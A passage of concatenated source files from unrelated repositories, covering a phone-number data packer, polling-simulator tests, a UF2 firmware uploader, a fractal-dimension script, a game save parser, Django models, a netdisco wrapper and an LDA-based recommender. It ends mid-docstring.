#### File: 20326/packme/phone_pack.py ```python import argparse import os import struct import codecs import csv import collections from datetime import datetime __author__ = 'brian' __version__ = '1.0.0' class DataConverter(object): table = collections.OrderedDict() tableData = collections.OrderedDict() def __init__(self, cvs_file=None, out_file=None, version=None): self.head_fmt = "<4si" self.phone_fmt = "<iiB" self.head_fmt_length = struct.calcsize(self.head_fmt) self.phone_fmt_length = struct.calcsize(self.phone_fmt) self.first_index_offset = 0 self.phone_record_count = 0 self.cvs_file = cvs_file self.out_file = out_file self.dat_version = str(version) self.carriers = { "移动": 1, "联通": 2, "电信": 3, "中国移动": 1, "中国联通": 2, "中国电信": 3, "电信虚拟运营商": 4, "联通虚拟运营商": 5, "移动虚拟运营商": 6, "未知电信运营商": 7, } if cvs_file is None: self.cvs_file = os.path.join(os.path.dirname(__file__), "mobile.1810.csv") # index offset index_offset = self.head_fmt_length with codecs.open(self.cvs_file, mode='r') as FILE: reader = csv.reader(FILE) for row in reader: self.phone_record_count = self.phone_record_count + 1 # if self.phone_record_count >10: # break # no prefix province city carrier region zipCode # 1 1300000 山东 济南 中国联通 531 250000 # 记录区 中每条记录的格式为"<省份>|<城市>|<邮编>|<长途区号>\0"。 每条记录以'\0'结束; # 索引区 中每条记录的格式为"<手机号前七位><记录区的偏移><卡类型>",每个索引的长度为9个字节; no = int(row[1]) carrier = self.carriers.get(row[4], 7) dat_str = "{}|{}|{}|{}\0".format(row[2], row[3], row[6], str(row[5])) idx_name = "{}.{}.{}".format(row[0], row[1], row[6]) self.table[no] = { "no": no, "carrier": carrier, "data": dat_str, } self.tableData[dat_str] = 0 def pack(self): # ### 手机号归属地查询 # | 4 bytes | <- phone.dat 版本号(如:1701即17年1月份) # ------------ # | 4 bytes | <- 第一个索引的偏移 # ----------------------- # | offset - 8 | <- 记录区 # ----------------------- # | index | <- 索引区 # ----------------------- # # 1. 头部为8个字节,版本号为4个字节,第一个索引的偏移为4个字节; # 2. 记录区 中每条记录的格式为"<省份>|<城市>|<邮编>|<长途区号>\0"。 每条记录以'\0'结束; # 3. 索引区 中每条记录的格式为"<手机号前七位><记录区的偏移><卡类型>",每个索引的长度为9个字节; with open(self.out_file, "wb") as FILE: # pack data # 记录数据多条重复, 合并记录区 data_buffer = b'' index_offset = self.head_fmt_length for key, value in self.tableData.items(): # 计算索引offset self.tableData[key] = index_offset index_offset = index_offset + len(key) # 组合记录区数据 data_buffer += struct.pack(str(len(key)) + "s", key) # 设置索引offset self.first_index_offset = index_offset # pack header header_buffer = struct.pack(self.head_fmt, self.dat_version.encode('utf-8'), self.first_index_offset) # write buffer FILE.write(header_buffer) FILE.write(data_buffer) # pack index for key, value in self.table.items(): data_offset = self.tableData[value["data"]] index_buffer = struct.pack(self.phone_fmt, value["no"], data_offset, value["carrier"]) FILE.write(index_buffer) def version(self): print("Version: {}".format(self.dat_version)) print("File: {}".format(self.out_file)) print("Size: {}".format(os.path.getsize(self.out_file))) print("Count: {}".format(self.phone_record_count)) def cmdline_parser(): defaultVersion = datetime.now().strftime('%y%m') parser = argparse.ArgumentParser(description=u'PackMe: 生成phone.dat数据文件') parser.add_argument('-i', '--input', metavar=u'file', help=u'csv源文件路径', required=True) parser.add_argument('-o', '--output', metavar=u'file', help=u'生成phone.dat数据文件路径', default="phone.{}.dat".format(defaultVersion), required=False) parser.add_argument('-v', '--version', metavar=u'2010', help=u'版本号', type=int, default=defaultVersion, required=False) return parser def main(): parser = cmdline_parser() args = parser.parse_args() pp = DataConverter(args.input, args.output, args.version) pp.pack() pp.version() if __name__ == '__main__': main() ```
{ "source": "2039/polling_simulator", "score": 3 }
#### File: 2039/polling_simulator/test.py ```python import argparse import unittest from random import seed from polling import poll, votes, Population, Tally, sigma from collections import Counter # Parse command line arguments parser = argparse.ArgumentParser() parser.add_argument("-t", "--test", default=[], type=int, nargs="*", help="Run given tests.") parser.add_argument("-s", "--seed", default=0, type=int, help="Set seed.") options = parser.parse_args() # === class Test_Population(unittest.TestCase): def setUp(self): self.pop_dict = { "a" : 10, "b" : 20, "c" : 30, } self.empty = Population({}) self.pop = Population(self.pop_dict) def test_weights(self): self.assertEqual(self.empty.weights, ()) self.assertEqual(self.pop.weights, tuple(self.pop_dict.values())) def test_groups(self): self.assertEqual(self.empty.groups, ()) self.assertEqual(self.pop.groups, tuple(self.pop_dict.keys())) def test_size(self): self.assertEqual(self.empty.size, 0) self.assertEqual(self.pop.size, 60) def test_len(self): self.assertEqual(len(self.empty), 0) self.assertEqual(len(self.pop), 3) def test_vars(self): self.assertEqual(vars(self.empty), {}) self.assertEqual(vars(self.pop), self.pop_dict) def test_getter(self): self.assertEqual(self.pop["a"], 10) self.assertEqual(self.pop["b"], 20) self.assertEqual(self.pop["c"], 30) def test_p(self): self.assertEqual(self.pop.p("a"), 10/60) self.assertEqual(self.pop.p("b"), 20/60) self.assertEqual(self.pop.p("c"), 30/60) def test_iterable(self): for g1, g2 in zip(self.pop, self.pop_dict): self.assertEqual(g1, g2) def test_contains(self): for group in self.pop_dict: group in self.pop class Test_Voting(unittest.TestCase): def setUp(self): seed(options.seed) self.votes = votes def test_empty(self): population = Population(dict()) vote_count = sum(1 for _vote in self.votes(population, 0)) self.assertEqual(vote_count, 0) def test_sample(self): population = Population({ "a" : 10, "b" : 20, "c" : 30, }) for vote in self.votes(population, 5): self.assertIn(vote, population.groups) class Test_Tallying(unittest.TestCase): def setUp(self): seed(options.seed) self.Tally = Tally def test_empty(self): population = Population(dict()) tally_count = sum(1 for _tally in self.Tally(population, 0, 1)) self.assertEqual(tally_count, 0) def test_sample(self): population = Population({ "a" : 20, "b" : 40, "c" : 60, }) N, n = 74, 3 tallies = list(self.Tally(population, N, n)) counts = [sum(tally.values()) for tally in tallies] self.assertEqual(counts, [25, 25, 24]) self.assertEqual(len(tallies), n) class Test_Poll_With_Replacement(unittest.TestCase): def setUp(self): seed(options.seed) from functools import partial self.poll = partial(poll, without_replacement=False) def test_empty(self): population = Population(dict()) self.assertEqual(self.poll(population, 0), Counter()) def test_poll_N(self): population = Population({ "a" : 10, "b" : 20, "c" : 30, }) for N in (3, 7, 31): polling = self.poll(population, N) votes = sum(polling.values()) self.assertEqual(votes, N) def test_uniqueness(self): population = Population({ "a" : 10, "b" : 20, "c" : 30, }) poll1 = self.poll(population, 15) poll2 = self.poll(population, 15) # Probabilistic test self.assertNotEqual(poll1, poll2) def test_poll_all(self): population = Population({ "a" : 10, "b" : 20, "c" : 30, }) N = sum(population.weights) polling = self.poll(population, N) # Probabilistic test self.assertNotEqual(polling, Counter(vars(population))) self.assertEqual(polling.keys(), vars(population).keys()) class Test_Poll_Without_Replacement(unittest.TestCase): def setUp(self): seed(options.seed) from functools import partial self.poll = partial(poll, without_replacement=True) def test_empty(self): population = Population(dict()) self.assertEqual(self.poll(population, 0), Counter()) def test_poll_N(self): population = Population({ "a" : 10, "b" : 20, "c" : 30, }) for N in (3, 7, 31): polling = self.poll(population, N) votes = sum(polling.values()) self.assertEqual(votes, N) def test_uniqueness(self): population = Population({ "a" : 10, "b" : 20, "c" : 30, }) poll1 = self.poll(population, 15) poll2 = self.poll(population, 15) # Probabilistic test self.assertNotEqual(poll1, poll2) def test_poll_all(self): population = Population({ "a" : 10, "b" : 20, "c" : 30, }) N = sum(population.weights) polling = poll(population, N, without_replacement=True) self.assertEqual(polling, Counter(vars(population))) class Test_Variance(unittest.TestCase): def test_simple(self): args_result = { (0.0,) : 0.0, (0.1,) : 0.30000000000000004, (0.3,) : 0.458257569495584, (0.5,) : 0.5, (1.0,) : 0.0, } for args, result in args_result.items(): self.assertEqual(sigma(*args), result) def test_multiple(self): args_result = { (0.0, 1) : 0.0, (0.1, 3) : 0.17320508075688773, (0.3, 20) : 0.10246950765959598, (0.5, 90) : 0.05270462766947299, (1.0, 999) : 0.0, } for args, result in args_result.items(): self.assertEqual(sigma(*args), result) def test_fpc(self): args_result = { (0.0, 1, 20) : 0.0, (0.1, 3, 20) : 0.16383560438182507, (0.3, 20, 20) : 0.0, (0.5, 90, 100) : 0.0167506302543202, (1.0, 999, 1000) : 0.0, } for args, result in args_result.items(): self.assertEqual(sigma(*args), result) tests = [ Test_Population, Test_Voting, Test_Tallying, Test_Poll_With_Replacement, Test_Poll_Without_Replacement, Test_Variance, ] tests = [tests[t-1] for t in options.test] runner = unittest.TextTestRunner() for test in tests: test_suite = unittest.defaultTestLoader.loadTestsFromTestCase(test) result = runner.run(test_suite) ```
{ "source": "203Electronics/UF2-Upload", "score": 3 }
#### File: 203Electronics/UF2-Upload/uf2upload.py ```python import shutil import re import argparse from os.path import exists import sys try: import psutil except: print("psutil not installed, run \"pip install psutil\"") sys.exit(1) print("UF2-Upload V1.0\nCopyright 2022 203 Electronics.\n"); parser = argparse.ArgumentParser(description='Host utilts for UF2 Bootloader Devices - 203 Electronics, 2022') parser.add_argument('-f', metavar='<file path>', type=ascii, help='UF2 file to upload to target') parser.add_argument('-d', metavar='<device name>', type=ascii, help='Target UF2 Device name (Model in INFO_UF2.TXT)') parser.add_argument('-r', action='store_true', help='Repeat upload for matched UF2 devices') parser.add_argument('-l', action='store_true', help='List all matched UF2 devices') args = parser.parse_args() if len(sys.argv) < 2: parser.print_help() sys.exit(1) class uf2: mountpoint = None info = None model = None board_id = None date = None def __repr__(self): return f"UF2(mountpoing='{self.mountpoint}'. info='{self.info}', model='{self.model}', board_id='{self.board_id}', date='{self.date}'" def get_uf2_drives(name = None): if name: name = name.replace("\'", "").replace("\"", "") drives = list(filter(lambda x: 'removable' in x.opts, psutil.disk_partitions())) uf2_devices = [] for drive in drives: if exists(drive.mountpoint + "INFO_UF2.TXT"): with open(drive.mountpoint + 'INFO_UF2.TXT', "r") as f: info = f.read() uf2_device = uf2() uf2_device.mountpoint = drive.mountpoint uf2_device.info = info.partition('\n')[0] uf2_device.model = re.search('(?:Model: )([^\r\n]+)', info).group(1) uf2_device.board_id = re.search('(?:Board-ID: )([^\r\n]+)', info).group(1) uf2_device.date = re.search('(?:Date: )([^\r\n]+)', info).group(1) if(name == None or bool(re.search(name, uf2_device.model))): uf2_devices.append(uf2_device) else: print("INFO_UF2.TXT does not exists") return uf2_devices uf2_devices = get_uf2_drives(args.d) if(args.l): print(f"{len(uf2_devices)} device(s) detected:") for index, uf2_device in enumerate(uf2_devices): print(f"Device #{index + 1}: {uf2_device.model} ({uf2_device.board_id})") if(args.f): file = args.f.replace("\'", "").replace("\"", "") if exists(file) is False: raise Exception("File does not exist!") filename = file.split('\\')[-1] if filename.endswith(".uf2") is False: raise Exception("File is not an UF2 file!") for index, uf2_device in enumerate(uf2_devices): print(f"Uploading {filename} to device {uf2_device.model} ({uf2_device.board_id})...") try: #UF2 disconnects after uploaded and copy will throw error shutil.copy2(file, uf2_device.mountpoint) except: pass print("Done Uploading\n") if(args.r != True): break ```
{ "source": "203lir/FractalProject", "score": 3 }
#### File: 203lir/FractalProject/module1.py ```python import random import math import time import numpy from PIL import Image start = time.time() up = 400 down = 400 #center is the remaining probability #generates random list of points pointlist = [] x = 0 y = 32768 for i in range (0, 32768): where = random.randint(0, 1000) pointlist.append([x, y]) if where <= down: y += 6 elif where <= (up+down): y -= 6 x += 1 framesize = [32768, 65536] #boxsize is distance from center to edges def checkboxes(boxsize, pointlist): #number of boxes which will be created in each direction xboxnum = int(framesize[0]/(boxsize*2)) yboxnum = int(framesize[1]/(boxsize*2)) boxlist = [] #creates boxes for i in range (xboxnum): addtoboxlist = [2*i*boxsize+boxsize] for j in range (yboxnum): addtoboxlist.append([2*j*boxsize+boxsize, False]) boxlist.append(addtoboxlist) #initializes previousx and previousy (purpose of these variables is in a later comment) previousx = 0 previousy = int(yboxnum/2) #looks through points, and checks to see if they are in a box for a in pointlist: for b in range ((previousx-2), (previousx+3)): for c in range ((previousy-2), (previousy+3)): #makes sure nothing weird is happening with b and c if b >= 0 and b <= xboxnum: if c >= 1 and c <= yboxnum: x = boxlist[b][0] y = boxlist[b][c][0] #checks if point is in box if a[0] >= (x-boxsize): if a[0] <= (x+boxsize): if a[1] >= (y-boxsize): if a[1] <= (y+boxsize): #marks the box the point is in as being "True" boxlist[b][c][1] = True break else: continue break #we know that the next point of the random walk will be near the current point, which means that we only have to check boxes relatively near the current point in order to have checked all boxes possible for the next point to be in; this significantly improves the speed of the program, instead of checking if the point is in every single box previousx = b previousy = c #counts how many boxes there are points in, and returns a list of points to be highlighted highlightedpointlist = [] counter = 0 for b in boxlist: for c in b: if isinstance(c, float): pass else: if c[1] == True: counter += 1 for i0 in range (int(b[0]-boxsize), int(b[0]+boxsize)): for i1 in range (int(c[0]-boxsize), int(c[0]+boxsize)): highlightedpointlist.append([i0, i1]) return [counter, highlightedpointlist] #creates image def createimage (pointlist, highlightedpointlist, name): MyImg = Image.new('RGB', (1024, 2048), "white") pixels = MyImg.load() scaledpointlist = [] #cuts off most of the data, since otherwise the image would be huge and unusable for n in pointlist: if n[0] < 1024: scaledpointlist.append([n[0], n[1]-31744]) for b in numberofboxestouched[1]: if b[1] > 31744 and b[1] < 33792: if b[0] < 1024: pixels[b[0], b[1]-31744] = (250, 200, 21) for a in scaledpointlist: pixels[a[0], a[1]] = (0, 0, 0) imagename = name + ".jpg" MyImg.save(imagename, quality=95) #delogged data to analyze boxnumlist = [] for i in range (9, 13): boxsize = 32768/(2**i) #we take log base 2 of all the numbers, then do a linear regression, in order to find an exponential regression of the data as a whole #this means that we can just use i as the x axis, instead of messing around with exponents and logs here boxscale = i numberofboxestouched = checkboxes(boxsize, pointlist) createimage(pointlist, numberofboxestouched[1], str(i-9)) boxnumlist.append([boxscale, math.log2(numberofboxestouched[0])]) #linear regression on delogged data #see Griswold's notes on linear regression #this part of the code finds the SSR, and creates the first quadratic equation linearTerm = 0 aCoefficient = 0 bCoefficient = 0 abCoefficient = 0 a2Coefficient = 0 b2Coefficient = 0 for i in boxnumlist: x = i[0] y = i[1] linearTerm += y**2 aCoefficient += 2*(-x)*y bCoefficient += 2*(-y) abCoefficient += 2*x a2Coefficient += x**2 b2Coefficient += 1 #solve with a variable, b constant aCoefficient1 = 2*a2Coefficient bCoefficient1 = abCoefficient linearTerm1 = -aCoefficient #solve with b variable, a constant aCoefficient2 = abCoefficient bCoefficient2 = 2*b2Coefficient linearTerm2 = -bCoefficient #solve system of equations LCM = numpy.lcm(aCoefficient1, aCoefficient2) aMultiplier1 = LCM/aCoefficient1 aMultiplier2 = LCM/aCoefficient2 newBCoefficient1 = bCoefficient1*aMultiplier1 newBCoefficient2 = bCoefficient2*aMultiplier2 newLinearTerm1 = linearTerm1*aMultiplier1 newLinearTerm2 = linearTerm2*aMultiplier2 newereBCoefficient = newBCoefficient1-newBCoefficient2 newerLinearTerm = newLinearTerm1-newLinearTerm2 b = newerLinearTerm/newereBCoefficient extranewLinearTerm1 = bCoefficient1*b extranewACoefficient = aCoefficient1 extranewLinearTerm2 = linearTerm1 a = (extranewLinearTerm2-extranewLinearTerm1)/extranewACoefficient print("Fractal dimension: ", a) print(boxnumlist) print("Time taken: ", time.time()-start) ```
{ "source": "203Null/Gravity-Rush-2-Save-Loader", "score": 3 }
#### File: 203Null/Gravity-Rush-2-Save-Loader/GR2-Save-Loader.py ```python import struct import json from collections import OrderedDict file_path = "data0002.bin" show_offset = True show_hash = False loaded_data = 0 def unpack(upstream_data_set): global loaded_data loaded_data = loaded_data + 1 currentCursor = file.tell() print(hex(file.tell())) file.seek(int.from_bytes(file.read(4), byteorder='little'), 0) variable_name = file.read(200).split(b'\x00')[0].decode('UTF8') #Use UTF8 because some strings are in Japanese print(hex(file.tell())) print(variable_name) file.seek(currentCursor + 4, 0) type = int.from_bytes(file.read(4), byteorder='little') data_location = file.tell() if type == 0x08: # List list_length = int.from_bytes(file.read(4), byteorder='little') name_hash = file.read(4).hex() data_location = file.tell() value = {} for i in range(0, list_length): unpack(value) value = OrderedDict(sorted(value.items())) else: if type % 0x10 == 0x0b: # String string_length = int.from_bytes(file.read(4), byteorder='little') - 1 data_location = type // 0x10 file.seek(data_location, 0) try: value = file.read(string_length).decode('UTF8') except: value = "ERROR EXTRACTING STRING" file.seek(currentCursor + 0x0c, 0) elif type == 0x09: # Float value = struct.unpack('f', file.read(4))[0] elif type == 0x0C: # Boolean value = int.from_bytes(file.read(1), byteorder='little') > 0 file.seek(3, 1) else: value = file.read(4).hex() print("Warring!!! Unknow type!!! %s at %s with value %s" % (hex(type), hex(file.tell()-8), value)) print() name_hash = file.read(4).hex() if variable_name == None: variable_name = hex(data_location) else: if show_hash: variable_name = variable_name = "%s %s" % (variable_name, name_hash) if show_offset: variable_name = variable_name = "%s %s" % (variable_name, hex(data_location)) print(value) upstream_data_set[variable_name] = value file = open(file_path, mode='rb') data = file.read() data_set = OrderedDict() if len(data) > 0x40 and data[0:4] == b'ggdL': file.seek(0x0c, 0) numOfData = int.from_bytes(file.read(4), byteorder='little') while loaded_data < numOfData: unpack(data_set) print() print(data_set) print() print("Complete with %i/%i data" % (loaded_data, numOfData)) with open(r"%s.txt" % (file_path.split('.')[0]), 'w', encoding='utf-8') as json_file: json.dump(data_set, json_file, indent=4, ensure_ascii=False) else: print("File Incorrect") ```
{ "source": "203Null/kthread", "score": 2 }
#### File: 203Null/kthread/setup.py ```python import setuptools import setuptools.command.test class NoseTestCommand(setuptools.command.test.test): def finalize_options(self): setuptools.command.test.test.finalize_options(self) self.test_args = [] self.test_suite = True def run_tests(self): import nose nose.run_exit(argv=["nosetests"]) with open("README.md", "r") as fd: long_description = fd.read() setuptools.setup( name="kthread", version="0.2.2", author="<NAME>", author_email="<EMAIL>", description="Killable threads in Python!", long_description=long_description, long_description_content_type="text/markdown", keywords="threading threads terminate", url="https://github.com/munshigroup/kthread", packages=setuptools.find_packages(exclude=["tests"]), tests_require=["nose"], classifiers=[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 2.7", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], cmdclass={"test": NoseTestCommand}, ) ```
{ "source": "2044smile/Djtube", "score": 2 }
#### File: posts/models/post.py ```python from django.db import models from users.models import User class Post(models.Model): user = models.ForeignKey( User, on_delete=models.CASCADE ) video_id = models.CharField( max_length=16, ) video_original_title = models.CharField( max_length=256, blank=True, null=True, ) title = models.CharField( max_length=256, ) content = models.TextField() created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def get_youtube_original_url(self): return "https://www.youtube.com/watch?v={post_video_id}".format( post_video_id=self.video_id ) youtube_original_url = property(get_youtube_original_url) def get_youtube_embed_url(self): return "https://www.youtube.com/embed/{video_id}".format( video_id=self.video_id, ) youtube_embed_url = property(get_youtube_embed_url()) def __str__(self): return self.title ``` #### File: users/views/signup.py ```python from django.conf import settings from django.contrib import messages from django.urls import reverse from django.views.generic import View from django.shortcuts import render, redirect from django.contrib.auth import get_user_model class SignupView(View): def get(self, request, *args, **kwargs): return render( request, 'users/signup.html', context={}, ) def post(self, request, *args, **kwargs): username = request.POST.get('username') password = request.POST.get('password') phonenumber = request.POST.get('phonenumber') # TODO - validations ( username ) user = get_user_model().objects.create_user( username=username, password=password, phonenumber=phonenumber, ) messages.add_message( request, messages.SUCCESS, settings.SIGNUP_SUCCESS_MESSAGE ) return redirect(reverse('users:login')) ```
{ "source": "2048-Bit/iot-inspector-client", "score": 3 }
#### File: iot-inspector-client/v2-src/netdisco.py ```python import threading import os import stat import utils import requests import subprocess import json import time BASE_BINARY_PATH = 'https://github.com/noise-lab/netdisco-python-wrapper/raw/master/release/device_identifier_{os}' # noqa DOWNLOAD_CHUNK_SIZE = 1024 * 1024 class NetdiscoWrapper(object): def __init__(self, host_state): self._host_state = host_state self._os = utils.get_os() self._netdisco_path = self._get_netdisco_path() def start(self): th = threading.Thread(target=self._start_thread) th.daemon = True th.start() def _start_thread(self): while True: if len(self._host_state.get_ip_mac_dict_copy()) > 0: utils.safe_run(self._run_netdisco) time.sleep(10) else: time.sleep(1) continue def _get_netdisco_path(self): exe_name = 'iot-inspector-netdisco' return os.path.join( os.path.expanduser('~'), 'princeton-iot-inspector', exe_name) def _download_netdisco_binary(self): if os.path.isfile(self._netdisco_path): return # Download the binary remote_binary_url = BASE_BINARY_PATH.format(os=self._os) response = requests.get(remote_binary_url, stream=True) with open(self._netdisco_path, 'wb') as fp: for chunk in response.iter_content(chunk_size=DOWNLOAD_CHUNK_SIZE): fp.write(chunk) # Make sure the binary is executable st = os.stat(self._netdisco_path) os.chmod(self._netdisco_path, st.st_mode | stat.S_IXUSR) def _run_netdisco(self): self._download_netdisco_binary() proc = subprocess.Popen(self._netdisco_path, stdout=subprocess.PIPE) data = proc.communicate()[0] for line in data.split('\n'): self._parse_netdisco_output(line) def _parse_netdisco_output(self, line): try: data = json.loads(line) except ValueError: return if 'version' in data: return device_type = data['device'] for device_info in data['info']: # Find IP device_ip = device_info['host'] device_info['device_type'] = device_type # Find MAC based on IP try: with self._host_state.lock: device_mac = self._host_state.ip_mac_dict[device_ip] except KeyError: return # Get device_id based on MAC device_id = utils.get_device_id(device_mac, self._host_state) # Submit for upload lter with self._host_state.lock: self._host_state.pending_netdisco_dict \ .setdefault(device_id, []).append(device_info) def test(): n = NetdiscoWrapper(None) n._download_netdisco_binary() if __name__ == '__main__': test() ```
{ "source": "204con/webcrawlingpc", "score": 3 }
#### File: 204con/webcrawlingpc/Driver.py ```python import MemoryExpress as me import Newegg as egg import PCPartPicker as pcpp import json def printData(data): for i in data: print(i + ' ' + str(data[i])) print() search = input("Enter your desired product: ") dataMemoryExpress = me.getDataMemoryExpress(search) dataNewegg = egg.getDataNewegg(search) dataPCPartPicker = pcpp.getDataPCPartPicker(search) print('Your input, ' + search + ', returned the following results for the lowest prices: \n') printData(dataMemoryExpress) printData(dataNewegg) printData(dataPCPartPicker) with open('StorageMemoryExpress.json','w') as file: json.dump(dataMemoryExpress, file, indent=4, sort_keys=True) file.close() with open('StorageNewegg.json','w') as file: json.dump(dataNewegg, file, indent=4, sort_keys=True) file.close() with open('StoragePCPartPicker.json','w') as file: json.dump(dataPCPartPicker, file, indent=4, sort_keys=True) file.close() ```
{ "source": "2051289v/CardiacArtefactBeamformer", "score": 3 }
#### File: 2051289v/CardiacArtefactBeamformer/useful_snippets.py ```python import numpy as np # find the smallest difference between the closest events in 2 time series def findMinDiff(arr,arr2): minDiffs=[]; for x in arr: minDiffs.append(min(abs(arr2-x))) return minDiffs def trimmean(arr, percent, axis): n = len(arr) k = int(round(n*(float(percent)/100)/2)) return np.mean(arr[k+1:n-k], axis=axis) def find_subset(vec,lowerbound,upperbound): idx=np.arange(np.argmin(abs(vec-lowerbound)),np.argmin(abs(vec-upperbound))+1) return idx ```
{ "source": "205Consulting/OpenSource", "score": 3 }
#### File: OpenSource/bipartite_lda/base_class.py ```python import networkx as nx from networkx.algorithms import bipartite import gensim import numpy as np import time import json # todo: # add hyperparameters i.e num_topics, iterations, w/e ''' class: bpg_recommender usage: write a new class (i.e, "soundcloud_recommender") that inherits bpg_recommender. overrwrite additional_feature_factory with whatever extra features you want to specific to your data. call in the init of that new class "initialize" given the user you want to recommend for (this returns a partition index that the user is in). Use the gather_data method to gather data. ------ old: Write a run method for your new class that loops through self.nodes[partition_index^1], i.e the other partition index, and use the gather data module to gather data. Later, in your new class, you can make a classifier that uses this data to predict. ''' ### README: # Requirements: each node in bipartite graph must have str() method # and that str() method must be unique. needed for gensim (i think). class bpg_recommender(object): # b: bipartite graph to run recommendations on def __init__(self, b, num_clusters = 6): self.b = b self.num_clusters = num_clusters self.nodes_sorted = None # split the graph into it's two partitions self.nodes = list(bipartite.sets(b)) self.mappings = [] # NOTE: self.copora[0] consideres each node in self.nodes[0] and makes a bag of songs representation for it's neighbors. # i.e self.corpora[0] is what we pass into lda when we want to model the nodes in self.nodes[0] as documents and the nodes in self.nodes[1] as "words" self.corpora, self.dicts = self._get_graph_corpora() # lda_models[0] would be the lda model where the "documents" are sets of nodes in self.nodes[1] self.lda_models = self._train_lda_models() # per_cluster_node_distributions[0] is an array of dicts, each dict mapping id->probability for that cluster index self.per_cluster_node_distributions = self._find_per_cluster_node_distributions() self.per_dnode_cluster_distributions = self._find_per_dnode_cluster_distributions() def print_node(node): ''' function: print_node params: node - node to print notes: users should overwrite this function. ''' print node def additional_feature_factory(self, node): ''' function: additional_feature_factory params: node - node to get features for returns: python list of additional features notes: see feature_factory. users should overrwrite this function. ''' return [] def feature_factory(self, node): ''' function: feature_factory params: node - node to get features for returns: python list of features for the node notes: users that inherit bpg_recommender should overrwrite "additional_feature_factory" with and specific features they have, and then call feature_factory on their nodes ''' features = [] # append all the base features that we have for mapping in self.mappings: features.append(mapping[node]) # append additional, non-agnostic features features += self.additional_feature_factory(node) return features def _find_per_dnode_cluster_distributions(self): return [self._find_per_dnode_cluster_distribution(0),self._find_per_dnode_cluster_distribution(1)] def _find_per_dnode_cluster_distribution(self, partition_index): return None #todo: not clear if this is something I should pre-compute.. not too hard to get from # gensim using .inference (as in the code currently) def _find_per_cluster_node_distributions(self): return [self._find_per_cluster_node_distribution(0), self._find_per_cluster_node_distribution(1)] def _find_per_cluster_node_distribution(self, partition_index): ''' function: _find_per_cluster_node_distribution params: partition_index - which lda model we're looking at returns: an num-clusters length array, the ith element a dict representing the ith cluster. that dict has nodes as keys and probability that that cluster generates that node as values. notes: this function is essentially because gensim makes it wierd to find these values using their data structures ''' dist = [] # iterate through topics for cluster in range(self.num_clusters): cluster_dist_dict = {} # get probability distribution cluster_dist = self.lda_models[partition_index].state.get_lambda()[cluster] # normalize to real probability distribution cluster_dist = cluster_dist / cluster_dist.sum() for i in range(len(cluster_dist)): # map the string id of the node to the probability (self.dict goes from gensim's id -> my string id) cluster_dist_dict[self.dicts[partition_index][i]] = cluster_dist[i] # append to array of dicts dist.append(cluster_dist_dict) return dist def _get_partition_corpus(self,partition): ''' function: _get_partition_corpus params: partition - which partition to get the corpus for returns: corpus - gensim corpus, each document being the neighbors of a node in our partition dictionary - gensim dictionary for the above corpus ''' # build bags of neighbors bags_of_neighbors = [] for node in partition: bags_of_neighbors.append(self._node_to_bagofneighbors(node)) # create gensim dictionary dictionary = gensim.corpora.Dictionary(bags_of_neighbors) # change to wierd gensim bow format corpus = [dictionary.doc2bow(bon) for bon in bags_of_neighbors] return corpus, dictionary def _get_graph_corpora(self): # left nodes: zero_corpus, zero_dict = self._get_partition_corpus(self.nodes[0]) # right nodes: one_corpus, one_dict = self._get_partition_corpus(self.nodes[1]) return [zero_corpus, one_corpus], [zero_dict, one_dict] def _train_lda_models(self): return [self._train_lda_model(0), self._train_lda_model(1)] def _train_lda_model(self, partition_index): lda = gensim.models.ldamodel.LdaModel(corpus=self.corpora[partition_index], id2word=self.dicts[partition_index], num_topics=6) return lda # self.lda_models[partition_index] = lda def _check_lda_model(self, partition_index): if self.lda_models[partition_index] == None: self._train_lda_model(partition_index) else: return def _node_to_bagofneighbors(self,node): # currently returns the string of the id's for the neighbors. ***TODO: make __str__ method return [str(neighbor) for neighbor in self.b.neighbors(node)] def backwards_LDA_psu(self, node): ''' function: backwards_LDA_psu params: node - the node we are recommending for (not the node we want the backwards LDA psu for) returns: scores - a dict mapping nodes to their backwards LDA psu scores notes: we want to find argmax_s P(s|u), where u=user s=song. by bayes, argmax_s P(s|u) = argmax_s P(u|s)P(s), the denominator P(u) being cancelled away. we can find P(u|s) by treating the songs as "generating" users (something like backwards LDA). The generative story there would be that when a song "generates" a user, i.e when a song is good enough that a user likes it, the way that happens is first the song appeals to some group, and then the song appeals to some person in that group. P(s) can be treated as uniform to make recommendations not care about the popularity of the song; else, P(s) could either be estimated by something like playback count, or could be found from the graph by degree. ''' # backwards LDA so we take the other partition index (^1); note that "node" is NOT in nodes[partition_index] partition_index = (self._find_partition_index(node)^1) #just more or less an assertion, should have been trained in init (was needed for old code) self._check_lda_model(partition_index) scores = {} to_sort = [] for node_to_check in self.nodes[partition_index]: # find P(t|s) as 'gamma' bag_rep = self._node_to_bagofneighbors(node_to_check) gensim_bow = self.dicts[partition_index].doc2bow(bag_rep) gamma, sstats = self.lda_models[partition_index].inference([gensim_bow]) normalized_gamma = gamma[0]/sum(gamma[0]) # score is sum over t (P(t|s)P(u|t)) = P(u|s) by independence assumptions of LDA. P(t|s) = normalized_gamma[dist_index], P(u|t) = per_cluster_node_dist[part_index][dist_index][str(node)]. # # sum over t: # score = 0 # for cluster_index in range(len(self.per_cluster_node_distributions[partition_index])): # #P(t|s): # p_t_given_s = normalized_gamma[cluster_index] # # P(u|t): # p_u_given_t = self.per_cluster_node_distributions[partition_index][cluster_index][str(node)] # # add to score # score += p_t_given_s * p_u_given_t # ____ NOTE: BECAUSE OF 1-NEIGHBOR NODES IN THE GRAPH, NEED TO INCLUDE P(S) PROBABLY ____ ## score = sum([self.per_cluster_node_distributions[partition_index][dist_index][str(node)]*normalized_gamma[dist_index] for dist_index in range(len(self.per_cluster_node_distributions[partition_index]))]) # scores[node_to_check] = score to_sort.append((node_to_check, score)) # sort on highest scores to_sort.sort(key=lambda x: x[1], reverse=True) nodes_sorted = [x[0] for x in to_sort] return scores, nodes_sorted def _find_partition_index(self, node): ''' function: _find_partition_index params: node - node to look for returns: partition_index: which partition 'node' is in ''' if node in self.nodes[0]: partition_index = 0 elif node in self.nodes[1]: partition_index = 1 else: raise nx.NetworkXException('The node you are trying to recommend for does not exist in the graph') return partition_index def forwards_LDA_psu(self, node): ''' function: forwards_LDA_psu params: node - node we are recommending for (not the node we are looking for the score for) returns: scores - dict mapping nodes to their forwards LDA psu scores scores_cosine_sim - dict mapping nodes to the cosine similarity between that node's cluster distribution and the original "node"'s cluster distribution notes: again we look for argmax_s P(s|u), but now we model it more directly by running LDA treating users as generating songs. Then argmax P(s|u) is simply the most likely 